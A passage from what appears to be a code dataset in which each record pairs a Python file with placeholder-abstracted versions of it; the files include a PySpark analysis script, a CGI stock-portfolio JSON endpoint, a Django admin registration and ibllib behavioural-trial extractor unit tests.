range_func(measures):\n scores = []\n for entry in measures:\n try:\n curr = int(entry[1])\n except:\n curr = None\n if curr is not None:\n scores.append(curr)\n if len(scores) < 1:\n return 0\n return max(scores) - min(scores)\n\n\nmeasure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda\n l: l.encode().split(',')).map(lambda x: (x[1], x[0]))\nprocedure_score_range = procedure_care_grouped.map(lambda p: (p[0],\n range_func(p[1]))).join(measure_dates)\nsorted_ranges = procedure_score_range.sortBy(lambda x: x[1], False)\ntop = sorted_ranges.take(10)\nprint(top)\n", "<import token>\nsc = SparkContext('local', 'weblog app')\neffective_care = sc.textFile('file:///data/exercise1/effective_care').map(\n lambda l: l.encode().split(',')).map(lambda x: (x[0], x[1:]))\nprocedure_care = effective_care.map(lambda p: (p[1][1], [p[0], p[1][2]]))\nprocedure_care_grouped = procedure_care.groupByKey()\n\n\ndef range_func(measures):\n scores = []\n for entry in measures:\n try:\n curr = int(entry[1])\n except:\n curr = None\n if curr is not None:\n scores.append(curr)\n if len(scores) < 1:\n return 0\n return max(scores) - min(scores)\n\n\nmeasure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda\n l: l.encode().split(',')).map(lambda x: (x[1], x[0]))\nprocedure_score_range = procedure_care_grouped.map(lambda p: (p[0],\n range_func(p[1]))).join(measure_dates)\nsorted_ranges = procedure_score_range.sortBy(lambda x: x[1], False)\ntop = sorted_ranges.take(10)\nprint(top)\n", "<import token>\n<assignment token>\n\n\ndef range_func(measures):\n scores = []\n for entry in measures:\n try:\n curr = int(entry[1])\n except:\n curr = None\n if curr is not None:\n scores.append(curr)\n if len(scores) < 1:\n return 0\n return max(scores) - min(scores)\n\n\n<assignment token>\nprint(top)\n", "<import token>\n<assignment token>\n\n\ndef range_func(measures):\n scores = []\n for entry in measures:\n try:\n curr = int(entry[1])\n except:\n curr = None\n if curr is not None:\n scores.append(curr)\n if len(scores) < 1:\n return 0\n return 
max(scores) - min(scores)\n\n\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n<function token>\n<assignment token>\n<code token>\n" ]
false
61
4264cba9a6c39219d21bd21d4b21009bacd1db38
#!/usr/bin/python

import operator
import cgi, sys, LINK_HEADERS
import simplejson as json
from datetime import datetime
from dateutil import tz
from decimal import *
sys.path.insert(0, str(LINK_HEADERS.DAO_LINK))
from transaction_dao import Transaction_dao
from user_portfolio_dao import User_portfolio_dao
from user_stock_value_dao import User_stock_value_dao
from company_dao import Company_dao
from history_dao import History_dao
from sector_info_dao import Sector_info_dao
print "Content-Type: text/html\r\n\r\n"

form = cgi.FieldStorage()

if form.getvalue("username") != None:
    username = form.getvalue("username")
if form.getvalue("filter") != None:
    portfolio_filter = form.getvalue("filter")

    if portfolio_filter == '1':
        filter_flag = "ALL"
    elif portfolio_filter == '2':
        filter_flag = "ALGOS"
    elif portfolio_filter == '0':
        filter_flag = "USER"
    else:
        filter_flag = portfolio_filter

tdao = Transaction_dao()
u2 = User_stock_value_dao()
u1 = User_portfolio_dao()
cdao = Company_dao()
hdao = History_dao()

data={}

if filter_flag == "ALL":
    t = hdao.select_all(username)
    l = tdao.get_user_stock_list(username)
elif filter_flag == "ALGOS":
    t = hdao.select_all_algo_trades(username)
    l = tdao.get_all_algo_stock_list(username)
elif filter_flag == "USER":
    t = hdao.select_all_user_trades(username)
    l = tdao.get_only_user_stock_list(username)
else:
    t = hdao.select_algo_trades(username, filter_flag)
    l = tdao.get_algo_stock_list(username, filter_flag)

# HISTORY
if t:
    data['transactions']={}
    for i in range(len(t)):
        data['transactions'][i]={}
        #start date formatting
        from_zone = tz.tzutc()
        to_zone = tz.tzlocal()
        date_time = t[i].get_trans_date()
        date_time = date_time.strftime('%Y-%m-%d %H:%M:%S')
        date_time = datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S')
        date_time = date_time.replace(tzinfo=from_zone)
        updated_date_time = date_time.astimezone(to_zone)
        updated_date_time = updated_date_time.strftime('%Y-%m-%d %H:%M:%S')
        #end date formatting
        data['transactions'][i]['trans_date'] = updated_date_time
        data['transactions'][i]['trans_type'] = t[i].get_trans_type()

# try:
# data['transactions'][i]['name']=cdao.get_company_model(t[i].get_stock()).get_name()
# except:
# data['transactions'][i]['name']=""

        data['transactions'][i]['stock'] = t[i].get_stock()
        data['transactions'][i]['price'] = t[i].get_price()
        data['transactions'][i]['total_price'] = t[i].get_total_price()
        data['transactions'][i]['volume'] = t[i].get_volume()
else:
    data['transactions']={}
    data['transactions'][0]={}
    data['transactions'][0]['trans_date'] = ""
    data['transactions'][0]['trans_type'] = ""
    data['transactions'][0]['name']=""
    data['transactions'][0]['stock'] = ""
    data['transactions'][0]['price'] = ""
    data['transactions'][0]['total_price'] = ""
    data['transactions'][0]['volume'] = ""

# OWNED STOCKS
sector_dao=Sector_info_dao()
data['sector_volume']={}
if l:
    data['owned_stocks']={}
    #total_stock_value = 0

# for i in range(len(l)):
# c = cdao.get_company_model(l[i])

    c = cdao.get_list_of_company_models(l)
    if c:
        for i in range(len(c)):
            try:
                o = tdao.get_owned_stock_model(username, c[i].get_symbol(), c[i].get_ask())
            except:
                continue
            data['owned_stocks'][i]={}
            data['owned_stocks'][i]['name']=c[i].get_name()
            data['owned_stocks'][i]['stock'] = c[i].get_symbol()
            data['owned_stocks'][i]['current_shares'] = o.get_volume()
            data['owned_stocks'][i]['current_price'] = c[i].get_ask()
            data['owned_stocks'][i]['total_worth'] = o.get_total_worth()
            data['owned_stocks'][i]['profit'] = o.get_profit()
            #total_stock_value = Decimal(total_stock_value) + Decimal(o.get_total_worth())

            #--------Code for chart - sector_volume:---
            volume=o.get_volume()
            symbol=c[i].get_symbol()
            try:
                sector=sector_dao.get_sector_by_symbol(symbol)
                if(sector.strip()==''):sector="Other"
            except:
                sector="Other"

            if(sector not in data['sector_volume']):
                data['sector_volume'][sector]=volume;
            else:
                data['sector_volume'][sector]+=volume;
            #----------end of code for chart--------

else:
    data['owned_stocks']={}
    data['owned_stocks'][0]={}
    data['owned_stocks'][0]['name'] =""
    data['owned_stocks'][0]['stock'] = ""
    data['owned_stocks'][0]['current_shares'] = ""
    data['owned_stocks'][0]['current_price'] = ""
    data['owned_stocks'][0]['total_worth'] = ""
    data['owned_stocks'][0]['profit'] = ""

# PORTFOLIO INFORMATION
#---------------------Code for Chart Generation-----------------------------
sectors=[]
volume=[]

sorted_volume=sorted(data['sector_volume'].items(),key=operator.itemgetter(1))
length=len(sorted_volume);

#Insertion Sort
for i in range(length):
    j=i
    while(j>0 and sorted_volume[j][1]>sorted_volume[j-1][1]):
        temp=sorted_volume[j-1]
        sorted_volume[j-1]=sorted_volume[j]
        sorted_volume[j]=temp
        j=j-1

MAX=35
for i in range(length):
    if(i>=MAX):break;
    if(sorted_volume[i][0]=='Other'):continue
    sectors.append(sorted_volume[i][0])
    volume.append(sorted_volume[i][1])


data['chart_axis']=sectors;
data['chart_data']=volume;
#--------------------------------end of code for chart--------------------#

up = u1.get_user_portfolio_model(username)
usv = u2.get_user_stock_value_model(username)
data['users']={}

if up:
    data['users']['total_portfolio'] = up.get_total_portfolio()
    data['users']['total_deposited'] = up.get_total_deposited()
    data['users']['available_funds'] = up.get_available_funds()
else:
    data['users']['total_portfolio'] = 0
    data['users']['total_deposited'] = 0
    data['users']['available_funds'] = 0

if usv:
    data['users']['total_stock_values'] = usv.get_total_stock_values()
    data['users']['profit'] = usv.get_profit()
else:
    data['users']['total_stock_values'] = 0
    data['users']['profit'] = 0


#----------------------------------code owned Stocks chart-----------------------------#

owned_stocks=data['owned_stocks']
owned_stocks_graph_data={}

sorted_owned_stocks_chart_axis=[]
sorted_owned_stocks_chart_value=[]

for i in owned_stocks:
    owned_stocks_graph_data[owned_stocks[i]['stock']]=owned_stocks[i]['total_worth']

length=len(owned_stocks_graph_data);
sorted_data=sorted(owned_stocks_graph_data.items(),key=operator.itemgetter(1))


for i in range(length-1,-1,-1):
    if(length-i>MAX):break
    sorted_owned_stocks_chart_axis.append(sorted_data[i][0])
    sorted_owned_stocks_chart_value.append(sorted_data[i][1])

data['owned_stocks_chart_axis']=sorted_owned_stocks_chart_axis;
data['owned_stocks_chart_value']=sorted_owned_stocks_chart_value;

json_result = json.dumps(data)
print json_result
[ "#!/usr/bin/python\n\nimport operator\nimport cgi, sys, LINK_HEADERS\nimport simplejson as json\nfrom datetime import datetime\nfrom dateutil import tz\nfrom decimal import *\nsys.path.insert(0, str(LINK_HEADERS.DAO_LINK))\nfrom transaction_dao import Transaction_dao\nfrom user_portfolio_dao import User_portfolio_dao\nfrom user_stock_value_dao import User_stock_value_dao\nfrom company_dao import Company_dao\nfrom history_dao import History_dao\nfrom sector_info_dao import Sector_info_dao\nprint \"Content-Type: text/html\\r\\n\\r\\n\"\n\nform = cgi.FieldStorage()\n\nif form.getvalue(\"username\") != None:\n username = form.getvalue(\"username\")\nif form.getvalue(\"filter\") != None:\n portfolio_filter = form.getvalue(\"filter\")\n\n if portfolio_filter == '1':\n filter_flag = \"ALL\"\n elif portfolio_filter == '2':\n filter_flag = \"ALGOS\"\n elif portfolio_filter == '0':\n filter_flag = \"USER\"\n else:\n filter_flag = portfolio_filter\n \ntdao = Transaction_dao()\nu2 = User_stock_value_dao()\nu1 = User_portfolio_dao()\ncdao = Company_dao()\nhdao = History_dao()\n\ndata={}\n\nif filter_flag == \"ALL\":\n t = hdao.select_all(username)\n l = tdao.get_user_stock_list(username)\nelif filter_flag == \"ALGOS\":\n t = hdao.select_all_algo_trades(username)\n l = tdao.get_all_algo_stock_list(username)\nelif filter_flag == \"USER\":\n t = hdao.select_all_user_trades(username)\n l = tdao.get_only_user_stock_list(username)\nelse:\n t = hdao.select_algo_trades(username, filter_flag)\n l = tdao.get_algo_stock_list(username, filter_flag)\n\n\n# HISTORY\nif t:\n data['transactions']={}\n \n for i in range(len(t)):\n data['transactions'][i]={}\n\t\n\t #start date formatting\n from_zone = tz.tzutc()\n to_zone = tz.tzlocal()\n date_time = t[i].get_trans_date()\n date_time = date_time.strftime('%Y-%m-%d %H:%M:%S')\n date_time = datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S')\t\n date_time = date_time.replace(tzinfo=from_zone)\n updated_date_time = date_time.astimezone(to_zone)\n updated_date_time = updated_date_time.strftime('%Y-%m-%d %H:%M:%S')\n\t #end date formatting\t\n\n data['transactions'][i]['trans_date'] = updated_date_time\n data['transactions'][i]['trans_type'] = t[i].get_trans_type()\n\n# try:\n# data['transactions'][i]['name']=cdao.get_company_model(t[i].get_stock()).get_name()\n# except:\n# data['transactions'][i]['name']=\"\"\n \n data['transactions'][i]['stock'] = t[i].get_stock()\n data['transactions'][i]['price'] = t[i].get_price()\n data['transactions'][i]['total_price'] = t[i].get_total_price()\n data['transactions'][i]['volume'] = t[i].get_volume()\nelse:\n data['transactions']={}\n data['transactions'][0]={}\n data['transactions'][0]['trans_date'] = \"\"\n data['transactions'][0]['trans_type'] = \"\"\n data['transactions'][0]['name']=\"\"\n data['transactions'][0]['stock'] = \"\"\n data['transactions'][0]['price'] = \"\"\n data['transactions'][0]['total_price'] = \"\"\n data['transactions'][0]['volume'] = \"\"\n \n\n\n# OWNED STOCKS\nsector_dao=Sector_info_dao()\ndata['sector_volume']={}\nif l:\n \n data['owned_stocks']={}\n #total_stock_value = 0\n \n# for i in range(len(l)):\n# c = cdao.get_company_model(l[i])\n \n c = cdao.get_list_of_company_models(l)\n if c:\n for i in range(len(c)):\n try:\n o = tdao.get_owned_stock_model(username, c[i].get_symbol(), c[i].get_ask()) \n except:\n continue\n \n data['owned_stocks'][i]={}\n data['owned_stocks'][i]['name']=c[i].get_name()\n data['owned_stocks'][i]['stock'] = c[i].get_symbol()\n data['owned_stocks'][i]['current_shares'] = 
o.get_volume()\n data['owned_stocks'][i]['current_price'] = c[i].get_ask()\n data['owned_stocks'][i]['total_worth'] = o.get_total_worth()\n data['owned_stocks'][i]['profit'] = o.get_profit()\n #total_stock_value = Decimal(total_stock_value) + Decimal(o.get_total_worth())\n\n #--------Code for chart - sector_volume:---\n volume=o.get_volume()\n symbol=c[i].get_symbol()\n try:\n sector=sector_dao.get_sector_by_symbol(symbol)\n if(sector.strip()==''):sector=\"Other\"\n except:\n sector=\"Other\"\n\n if(sector not in data['sector_volume']):\n data['sector_volume'][sector]=volume;\n else:\n data['sector_volume'][sector]+=volume;\n #----------end of code for chart--------\n \nelse:\n data['owned_stocks']={}\n data['owned_stocks'][0]={}\n data['owned_stocks'][0]['name'] =\"\"\n data['owned_stocks'][0]['stock'] = \"\"\n data['owned_stocks'][0]['current_shares'] = \"\"\n data['owned_stocks'][0]['current_price'] = \"\"\n data['owned_stocks'][0]['total_worth'] = \"\"\n data['owned_stocks'][0]['profit'] = \"\"\n\n# PORTFOLIO INFORMATION\n#---------------------Code for Chart Generation-----------------------------\nsectors=[]\nvolume=[]\n\nsorted_volume=sorted(data['sector_volume'].items(),key=operator.itemgetter(1))\nlength=len(sorted_volume);\n\n#Insertion Sort\nfor i in range(length):\n j=i\n while(j>0 and sorted_volume[j][1]>sorted_volume[j-1][1]):\n temp=sorted_volume[j-1]\n sorted_volume[j-1]=sorted_volume[j]\n sorted_volume[j]=temp\n j=j-1\n\nMAX=35\nfor i in range(length):\n if(i>=MAX):break;\n if(sorted_volume[i][0]=='Other'):continue\n sectors.append(sorted_volume[i][0])\n volume.append(sorted_volume[i][1])\n\n\ndata['chart_axis']=sectors;\ndata['chart_data']=volume;\n#--------------------------------end of code for chart--------------------#\n\nup = u1.get_user_portfolio_model(username)\nusv = u2.get_user_stock_value_model(username)\ndata['users']={}\n\nif up:\n data['users']['total_portfolio'] = up.get_total_portfolio()\n data['users']['total_deposited'] = up.get_total_deposited()\n data['users']['available_funds'] = up.get_available_funds()\nelse:\n data['users']['total_portfolio'] = 0\n data['users']['total_deposited'] = 0\n data['users']['available_funds'] = 0 \n\nif usv:\n data['users']['total_stock_values'] = usv.get_total_stock_values()\n data['users']['profit'] = usv.get_profit() \nelse:\n data['users']['total_stock_values'] = 0\n data['users']['profit'] = 0\n \n\n\n\n\n#----------------------------------code owned Stocks chart-----------------------------#\n\nowned_stocks=data['owned_stocks']\nowned_stocks_graph_data={}\n\nsorted_owned_stocks_chart_axis=[]\nsorted_owned_stocks_chart_value=[]\n\nfor i in owned_stocks:\n owned_stocks_graph_data[owned_stocks[i]['stock']]=owned_stocks[i]['total_worth']\n\nlength=len(owned_stocks_graph_data);\nsorted_data=sorted(owned_stocks_graph_data.items(),key=operator.itemgetter(1))\n\n\nfor i in range(length-1,-1,-1):\n if(length-i>MAX):break\n sorted_owned_stocks_chart_axis.append(sorted_data[i][0])\n sorted_owned_stocks_chart_value.append(sorted_data[i][1])\n\ndata['owned_stocks_chart_axis']=sorted_owned_stocks_chart_axis;\ndata['owned_stocks_chart_value']=sorted_owned_stocks_chart_value;\n\njson_result = json.dumps(data)\nprint json_result\n\n \n" ]
true
62
5c30b0e952ddf2e05a7ad5f8d9bbd4f5e22f887d
# strspn(str1,str2)
str1 = '12345678'
str2 = '456'
# str1 and chars both in str1 and str2
print(str1 and str2)

str1 = 'cekjgdklab'
str2 = 'gka'
nPos = -1
for c in str1:
    if c in str2:
        nPos = str1.index(c)
        break
print(nPos)
[ "# strspn(str1,str2)\nstr1 = '12345678'\nstr2 = '456'\n# str1 and chars both in str1 and str2\nprint(str1 and str2)\n\nstr1 = 'cekjgdklab'\nstr2 = 'gka'\nnPos = -1\nfor c in str1:\n if c in str2:\n nPos = str1.index(c)\n break\nprint(nPos)\n", "str1 = '12345678'\nstr2 = '456'\nprint(str1 and str2)\nstr1 = 'cekjgdklab'\nstr2 = 'gka'\nnPos = -1\nfor c in str1:\n if c in str2:\n nPos = str1.index(c)\n break\nprint(nPos)\n", "<assignment token>\nprint(str1 and str2)\n<assignment token>\nfor c in str1:\n if c in str2:\n nPos = str1.index(c)\n break\nprint(nPos)\n", "<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
63
a86b64ccd0dab4ab70ca9c2b7625fb34afec3794
from django.contrib import admin
from django_summernote.admin import SummernoteModelAdmin
from .models import ArticlePost
# Register your models here.

class SomeModelAdmin(SummernoteModelAdmin):  # instead of ModelAdmin
    summernote_fields = '__all__'

admin.site.register(ArticlePost, SummernoteModelAdmin)
[ "from django.contrib import admin\nfrom django_summernote.admin import SummernoteModelAdmin\nfrom .models import ArticlePost\n# Register your models here.\n\nclass SomeModelAdmin(SummernoteModelAdmin): # instead of ModelAdmin\n summernote_fields = '__all__'\n\nadmin.site.register(ArticlePost, SummernoteModelAdmin)", "from django.contrib import admin\nfrom django_summernote.admin import SummernoteModelAdmin\nfrom .models import ArticlePost\n\n\nclass SomeModelAdmin(SummernoteModelAdmin):\n summernote_fields = '__all__'\n\n\nadmin.site.register(ArticlePost, SummernoteModelAdmin)\n", "<import token>\n\n\nclass SomeModelAdmin(SummernoteModelAdmin):\n summernote_fields = '__all__'\n\n\nadmin.site.register(ArticlePost, SummernoteModelAdmin)\n", "<import token>\n\n\nclass SomeModelAdmin(SummernoteModelAdmin):\n summernote_fields = '__all__'\n\n\n<code token>\n", "<import token>\n\n\nclass SomeModelAdmin(SummernoteModelAdmin):\n <assignment token>\n\n\n<code token>\n", "<import token>\n<class token>\n<code token>\n" ]
false
64
f17d33f1d035da42dc9a2b4c0c60beefc6a48dea
import functools import shutil import tempfile import unittest import unittest.mock from pathlib import Path import numpy as np import pandas as pd import one.alf.io as alfio from ibllib.io.extractors import training_trials, biased_trials, camera from ibllib.io import raw_data_loaders as raw from ibllib.io.extractors.base import BaseExtractor def wheelMoves_fixture(func): """Decorator to save some dummy wheelMoves ALF files for extraction tests""" @functools.wraps(func) def wrapper(obj=None): # Save some wheelMoves ALF files attr_list = ['training_lt5', 'training_ge5', 'biased_lt5', 'biased_ge5'] alf_paths = [getattr(obj, p)['path'] / 'alf' for p in attr_list] n_trials = [getattr(obj, p)['ntrials'] for p in attr_list] for p, n in zip(alf_paths, n_trials): p.mkdir() np.save(str(p / '_ibl_wheelMoves.intervals.npy'), np.zeros((n, 2))) np.save(str(p / '_ibl_wheelMoves.peakAmplitude.npy'), np.zeros(n)) # Run method func(obj) # Teardown; delete the files for p in alf_paths: shutil.rmtree(p) return wrapper class TestExtractTrialData(unittest.TestCase): def setUp(self): self.main_path = Path(__file__).parent self.training_lt5 = {'path': self.main_path / 'data' / 'session_training_lt5'} self.biased_lt5 = {'path': self.main_path / 'data' / 'session_biased_lt5'} self.training_ge5 = {'path': self.main_path / 'data' / 'session_training_ge5'} self.biased_ge5 = {'path': self.main_path / 'data' / 'session_biased_ge5'} self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5['path'])) self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])) self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5['path'])) self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])) # turn off logging for unit testing as we will purposedly go into warning/error cases self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5' self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5' # Save some dummy wheel moves data for trial firstMovement_times extraction def test_get_feedbackType(self): # TRAINING SESSIONS ft = training_trials.FeedbackType( self.training_lt5['path']).extract()[0] self.assertEqual(ft.size, self.training_lt5['ntrials']) # check if no 0's in feedbackTypes self.assertFalse(ft[ft == 0].size > 0) # -- version >= 5.0.0 ft = training_trials.FeedbackType( self.training_ge5['path']).extract()[0] self.assertEqual(ft.size, self.training_ge5['ntrials']) # check if no 0's in feedbackTypes self.assertFalse(ft[ft == 0].size > 0) # BIASED SESSIONS ft = biased_trials.FeedbackType( self.biased_lt5['path']).extract()[0] self.assertEqual(ft.size, self.biased_lt5['ntrials']) # check if no 0's in feedbackTypes self.assertFalse(ft[ft == 0].size > 0) # -- version >= 5.0.0 ft = biased_trials.FeedbackType( self.biased_ge5['path']).extract()[0] self.assertEqual(ft.size, self.biased_ge5['ntrials']) # check if no 0's in feedbackTypes self.assertFalse(ft[ft == 0].size > 0) def test_get_contrastLR(self): # TRAINING SESSIONS cl, cr = training_trials.ContrastLR( self.training_lt5['path']).extract()[0] self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)])) self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)])) self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl)) self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl)) # -- version >= 5.0.0 cl, cr = training_trials.ContrastLR( self.training_ge5['path']).extract()[0] self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)])) self.assertTrue(all([np.sign(x) >= 0 for x in cr if 
~np.isnan(x)])) self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl)) self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl)) # BIASED SESSIONS cl, cr = biased_trials.ContrastLR( self.biased_lt5['path']).extract()[0] self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)])) self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)])) self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl)) self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl)) # -- version >= 5.0.0 cl, cr = biased_trials.ContrastLR( self.biased_ge5['path']).extract()[0] self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)])) self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)])) self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl)) self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl)) def test_get_probabilityLeft(self): # TRAINING SESSIONS pl = training_trials.ProbabilityLeft( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(pl, np.ndarray)) # -- version >= 5.0.0 pl = training_trials.ProbabilityLeft( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(pl, np.ndarray)) # BIASED SESSIONS pl = biased_trials.ProbabilityLeft( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(pl, np.ndarray)) # Test if only probs that are in prob set md = raw.load_settings(self.biased_lt5['path']) if md: probs = md['BLOCK_PROBABILITY_SET'] probs.append(0.5) self.assertTrue(sum([x in probs for x in pl]) == len(pl)) # -- version >= 5.0.0 pl = biased_trials.ProbabilityLeft( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(pl, np.ndarray)) # Test if only probs that are in prob set md = raw.load_settings(self.biased_ge5['path']) probs = md['BLOCK_PROBABILITY_SET'] probs.append(0.5) self.assertTrue(sum([x in probs for x in pl]) == len(pl)) def test_get_choice(self): # TRAINING SESSIONS choice = training_trials.Choice( session_path=self.training_lt5['path']).extract(save=False)[0] self.assertTrue(isinstance(choice, np.ndarray)) data = raw.load_data(self.training_lt5['path']) trial_nogo = np.array( [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0]) for t in data]) if any(trial_nogo): self.assertTrue(all(choice[trial_nogo]) == 0) # -- version >= 5.0.0 choice = training_trials.Choice( session_path=self.training_ge5['path']).extract(save=False)[0] self.assertTrue(isinstance(choice, np.ndarray)) data = raw.load_data(self.training_ge5['path']) trial_nogo = np.array( [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0]) for t in data]) if any(trial_nogo): self.assertTrue(all(choice[trial_nogo]) == 0) # BIASED SESSIONS choice = biased_trials.Choice( session_path=self.biased_lt5['path']).extract(save=False)[0] self.assertTrue(isinstance(choice, np.ndarray)) data = raw.load_data(self.biased_lt5['path']) trial_nogo = np.array( [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0]) for t in data]) if any(trial_nogo): self.assertTrue(all(choice[trial_nogo]) == 0) # -- version >= 5.0.0 choice = biased_trials.Choice( session_path=self.biased_ge5['path']).extract(save=False)[0] self.assertTrue(isinstance(choice, np.ndarray)) data = raw.load_data(self.biased_ge5['path']) trial_nogo = np.array( [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0]) for t in data]) if any(trial_nogo): self.assertTrue(all(choice[trial_nogo]) == 0) def test_get_repNum(self): # TODO: Test its sawtooth # TRAINING SESSIONS rn = training_trials.RepNum( 
self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(rn, np.ndarray)) for i in range(3): self.assertTrue(i in rn) # -- version >= 5.0.0 rn = training_trials.RepNum( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(rn, np.ndarray)) for i in range(4): self.assertTrue(i in rn) # BIASED SESSIONS have no repeted trials def test_get_rewardVolume(self): # TRAINING SESSIONS rv = training_trials.RewardVolume( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(rv, np.ndarray)) # -- version >= 5.0.0 rv = training_trials.RewardVolume( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(rv, np.ndarray)) # BIASED SESSIONS rv = biased_trials.RewardVolume( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(rv, np.ndarray)) # Test if all non zero rewards are of the same value self.assertTrue(all([x == max(rv) for x in rv if x != 0])) # -- version >= 5.0.0 rv = biased_trials.RewardVolume( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(rv, np.ndarray)) # Test if all non zero rewards are of the same value self.assertTrue(all([x == max(rv) for x in rv if x != 0])) def test_get_feedback_times_ge5(self): # TRAINING SESSIONS ft = training_trials.FeedbackTimes( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(ft, np.ndarray)) # BIASED SESSIONS ft = biased_trials.FeedbackTimes( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(ft, np.ndarray)) def test_get_feedback_times_lt5(self): # TRAINING SESSIONS ft = training_trials.FeedbackTimes( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(ft, np.ndarray)) # BIASED SESSIONS ft = biased_trials.FeedbackTimes( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(ft, np.ndarray)) def test_get_stimOnTrigger_times(self): # TRAINING SESSIONS sott = training_trials.StimOnTriggerTimes( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(sott, np.ndarray)) # -- version >= 5.0.0 sott = training_trials.StimOnTriggerTimes( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(sott, np.ndarray)) # BIASED SESSIONS sott = biased_trials.StimOnTriggerTimes( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(sott, np.ndarray)) # -- version >= 5.0.0 sott = biased_trials.StimOnTriggerTimes( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(sott, np.ndarray)) def test_get_stimOn_times_lt5(self): # TRAINING SESSIONS st = training_trials.StimOnTimes_deprecated( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(st, np.ndarray)) # BIASED SESSIONS st = biased_trials.StimOnTimes_deprecated( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(st, np.ndarray)) def test_get_stimOn_times_ge5(self): # TRAINING SESSIONS st = training_trials.StimOnTimes_deprecated( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(st, np.ndarray)) # BIASED SESSIONS st = biased_trials.StimOnTimes_deprecated( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(st, np.ndarray)) def test_stimOnOffFreeze_times(self): # TRAINING SESSIONS st = training_trials.StimOnOffFreezeTimes( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(st[0], np.ndarray)) # BIASED SESSIONS st = biased_trials.StimOnOffFreezeTimes( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(st[0], np.ndarray)) # TRAINING SESSIONS st = training_trials.StimOnOffFreezeTimes( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(st[0], np.ndarray)) # 
BIASED SESSIONS st = biased_trials.StimOnOffFreezeTimes( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(st[0], np.ndarray)) def test_get_intervals(self): # TRAINING SESSIONS di = training_trials.Intervals( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(di, np.ndarray)) self.assertFalse(np.isnan(di).all()) # -- version >= 5.0.0 di = training_trials.Intervals( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(di, np.ndarray)) self.assertFalse(np.isnan(di).all()) # BIASED SESSIONS di = biased_trials.Intervals( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(di, np.ndarray)) self.assertFalse(np.isnan(di).all()) # -- version >= 5.0.0 di = biased_trials.Intervals( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(di, np.ndarray)) self.assertFalse(np.isnan(di).all()) def test_get_response_times(self): # TRAINING SESSIONS rt = training_trials.ResponseTimes( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(rt, np.ndarray)) # -- version >= 5.0.0 rt = training_trials.ResponseTimes( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(rt, np.ndarray)) # BIASED SESSIONS rt = biased_trials.ResponseTimes( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(rt, np.ndarray)) # -- version >= 5.0.0 rt = biased_trials.ResponseTimes( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(rt, np.ndarray)) def test_get_goCueTrigger_times(self): # TRAINING SESSIONS data = raw.load_data(self.training_lt5['path']) gct = np.array([tr['behavior_data']['States timestamps'] ['closed_loop'][0][0] for tr in data]) self.assertTrue(isinstance(gct, np.ndarray)) # -- version >= 5.0.0 gct = training_trials.GoCueTriggerTimes( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(gct, np.ndarray)) # BIASED SESSIONS data = raw.load_data(self.biased_lt5['path']) gct = np.array([tr['behavior_data']['States timestamps'] ['closed_loop'][0][0] for tr 